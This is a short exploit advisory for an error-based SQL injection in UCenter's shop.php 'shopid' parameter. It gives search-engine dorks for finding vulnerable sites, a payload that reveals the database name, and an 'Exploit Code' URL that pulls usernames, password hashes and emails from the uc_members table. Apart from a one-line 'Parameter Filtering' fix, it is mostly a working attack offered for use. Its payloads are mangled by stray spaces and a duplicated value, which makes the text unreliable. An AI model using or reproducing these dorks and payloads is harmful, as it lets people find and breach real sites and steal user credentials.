Dork: Powered by UCenter inurl: shop. php? Ac = view
Dork 2: inurl: shop. php? Ac = view & shopid =
Vulnerability file: Shop. php
Values :(?) Ac = view & shopid =
Vulnerable Style: SQL Injection (MySQL Error Based)
Need Metarials: Hex Conversion
Your Need victim Database name.
For Inject: http: // server/shop. php? Ac = view & shopid = 253 and (select 1 from (select count (*), concat (select concat (0x7e, 0x27, unhex (hex (database (), 0x27, 0x7e) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1
..
DB: Okey.
Your edit db' [target db name]'
Example: hiwir1_ucenter
Edit: Okey.
Your use Hex conversion. And edit Your SQL Injection Exploit ..
Exploit Code: http: // server/shop. php? Ac = view & shopid = 253 253 and (select 1 from (select count (*), concat (select concat (0x7e, 0x27, cast (concat (uc_members.uid, 0x3a, uc_members.username, 0x3a, uc_members.password, 0x3a, uc_members.email) as char), 0x27, 0x7e) FROM 'hiwir1 _ ucenter '. uc_members LIMIT 0, 1) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1
Solution:
Parameter Filtering